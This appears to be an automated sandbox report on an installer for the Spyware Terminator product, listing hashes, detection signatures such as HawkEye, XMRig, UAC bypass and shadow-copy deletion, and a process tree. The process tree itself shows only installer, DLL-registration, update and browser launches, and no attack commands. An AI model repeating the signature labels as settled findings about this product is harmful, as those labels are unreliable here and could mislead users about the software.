Resubmissions

09-11-2024 01:51

241109-b9v7gavcmg 8

08-11-2024 22:41

241108-2l67ya1glj 10

Analysis

  • max time kernel
    1010s
  • max time network
    1201s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-11-2024 22:41

General

  • Target

    SpywareTerminatorSetup.exe

  • Size

    8.8MB

  • MD5

    c3a9452f054664daf4de1e246c485c20

  • SHA1

    e0185db4a5c5b7379a0eff099e39f0f56a18ba89

  • SHA256

    9f95bbe3fb28e4c290e869b40ae20dcd9db64071cda11a77a9313c0e13b55518

  • SHA512

    6438fb21aa223d354864b6ca14f42668007a17db718727266e54cd2b7f44e9924e51187b604cb7913dc550354114efc0b55834832f891ac6796a53abc928fca9

  • SSDEEP

    196608:59Xf8Of5m6QpeBh4BE8h1RipvU0SQ7pZ+nU8TjLkYJC:TXfvflGeX4BXr6vtH1AUI/7J

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Hawkeye family
  • Modifies Windows Defender notification settings 3 TTPs 4 IoCs
  • UAC bypass 3 TTPs 4 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • XMRig Miner payload 2 IoCs
  • Adds policy Run key to start application 2 TTPs 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Contacts a large (1448) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 3 IoCs
  • A potential corporate email address has been identified in the URL: [email protected]
  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Adds Run key to start application 2 TTPs 22 IoCs
  • Downloads MZ/PE file
  • Installs/modifies Browser Helper Object 2 TTPs 6 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Power Settings 1 TTPs 2 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Program crash 1 IoCs
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 8 IoCs
  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 36 IoCs
  • Drops file in Windows directory 4 IoCs
  • Executes dropped EXE 33 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies system executable filetype association 2 TTPs 24 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • EICAR Anti-Malware test file 1 IoCs
  • Makes web request to EICAR website 1 IoCs

    EICAR Anti-Malware test file, used to test the response of AV software.

  • Checks SCSI registry key(s) 3 TTPs 11 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\SpywareTerminatorSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\SpywareTerminatorSetup.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4204
    • C:\Users\Admin\AppData\Local\Temp\is-69TN6.tmp\SpywareTerminatorSetup.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-69TN6.tmp\SpywareTerminatorSetup.tmp" /SL5="$60180,8420808,160256,C:\Users\Admin\AppData\Local\Temp\SpywareTerminatorSetup.exe"
      2⤵
      • Checks computer location settings
      • Drops file in Program Files directory
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2340
      • C:\Windows\SysWOW64\regsvr32.exe
        "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell.dll"
        3⤵
        • Loads dropped DLL
        • Modifies system executable filetype association
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        PID:2620
      • C:\Windows\system32\regsvr32.exe
        "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell64.dll"
        3⤵
        • Loads dropped DLL
        • Modifies system executable filetype association
        • Modifies registry class
        PID:4112
      • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
        "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /INSTALL
        3⤵
        • Adds Run key to start application
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:3768
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell.dll"
          4⤵
          • Loads dropped DLL
          • Modifies system executable filetype association
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4404
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell64.dll"
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1952
          • C:\Windows\system32\regsvr32.exe
            /s "C:\Program Files (x86)\Spyware Terminator\STShell64.dll"
            5⤵
            • Loads dropped DLL
            • Modifies system executable filetype association
            • Modifies registry class
            PID:3648
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STInternetGuard.dll"
          4⤵
          • Installs/modifies Browser Helper Object
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Modifies registry class
          PID:760
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STInternetGuard64.dll"
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3288
          • C:\Windows\system32\regsvr32.exe
            /s "C:\Program Files (x86)\Spyware Terminator\STInternetGuard64.dll"
            5⤵
            • Installs/modifies Browser Helper Object
            • Loads dropped DLL
            • Modifies Internet Explorer settings
            • Modifies registry class
            PID:2344
        • C:\Program Files (x86)\Spyware Terminator\STInternetGuard.exe
          "C:\Program Files (x86)\Spyware Terminator\STInternetGuard.exe" /install
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4884
      • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
        "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /postinstall
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4676
        • C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
          "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /INSTALL
          4⤵
          • Drops file in Program Files directory
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:5052
        • C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorShield.exe
          "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorShield.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:692
          • C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
            "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:1736
          • C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
            "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:5100
          • C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
            "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4484
          • C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
            "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4184
      • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
        "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:5040
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.spywareterminator.com/purchase.aspx?cfg=8&lng=en&subid=W10&dinst=0&b=ST_APP_Motivation
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4884
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab0c646f8,0x7ffab0c64708,0x7ffab0c64718
            5⤵
              PID:4516
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
              5⤵
                PID:5068
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3376
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
                5⤵
                  PID:4420
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                  5⤵
                    PID:4300
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                    5⤵
                      PID:4840
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
                      5⤵
                        PID:4848
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
                        5⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4512
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
                        5⤵
                          PID:2244
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
                          5⤵
                            PID:1776
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
                            5⤵
                              PID:1492
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
                              5⤵
                                PID:1400
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                                5⤵
                                  PID:3556
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
                                  5⤵
                                    PID:2484
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                                    5⤵
                                      PID:3512
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1
                                      5⤵
                                        PID:4744
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1
                                        5⤵
                                          PID:1576
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
                                          5⤵
                                            PID:2408
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4880 /prefetch:2
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:344
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
                                            5⤵
                                              PID:4620
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3404 /prefetch:8
                                              5⤵
                                                PID:1184
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
                                                5⤵
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4172
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2268 /prefetch:1
                                                5⤵
                                                  PID:2752
                                        • C:\Program Files (x86)\Spyware Terminator\st_rsser64.exe
                                          "C:\Program Files (x86)\Spyware Terminator\st_rsser64.exe"
                                          1⤵
                                          • Drops file in Program Files directory
                                          • Executes dropped EXE
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:812
                                          • C:\Windows\system32\RUNDLL32.EXE
                                            "C:\Windows\system32\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\PROGRA~2\SPYWAR~1\Driver\stflt.inf
                                            2⤵
                                            • Drops file in Drivers directory
                                            PID:3088
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:3188
                                          • C:\Windows\System32\CompPkgSrv.exe
                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                            1⤵
                                              PID:4580
                                            • C:\Windows\System32\rundll32.exe
                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                              1⤵
                                                PID:1612
                                              • C:\Windows\SysWOW64\werfault.exe
                                                werfault.exe /h /shared Global\e519f5d68c924471852628982de743f6 /t 3192 /p 5040
                                                1⤵
                                                  PID:3780
                                                • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
                                                  "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:5056
                                                • C:\Windows\SysWOW64\werfault.exe
                                                  werfault.exe /h /shared Global\d5a742c81d284feda097b04498e76c9d /t 1636 /p 5056
                                                  1⤵
                                                    PID:1740
                                                  • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
                                                    "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
                                                    1⤵
                                                    • Adds Run key to start application
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:760
                                                    • C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
                                                      "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKBYUSER
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4880
                                                    • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
                                                      "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /FULLSCAN
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4116
                                                  • C:\Windows\SysWOW64\werfault.exe
                                                    werfault.exe /h /shared Global\87132cf9c735419d8a9ff5f92d38b777 /t 4616 /p 760
                                                    1⤵
                                                      PID:4604
                                                    • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
                                                      "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
                                                      1⤵
                                                      • Adds Run key to start application
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3636
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pcrx.com/purchase.aspx?st=8&lng=en
                                                        2⤵
                                                        • Enumerates system info in registry
                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:5084
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab0c646f8,0x7ffab0c64708,0x7ffab0c64718
                                                          3⤵
                                                            PID:2524
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2
                                                            3⤵
                                                              PID:4988
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 /prefetch:3
                                                              3⤵
                                                                PID:4804
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
                                                                3⤵
                                                                  PID:60
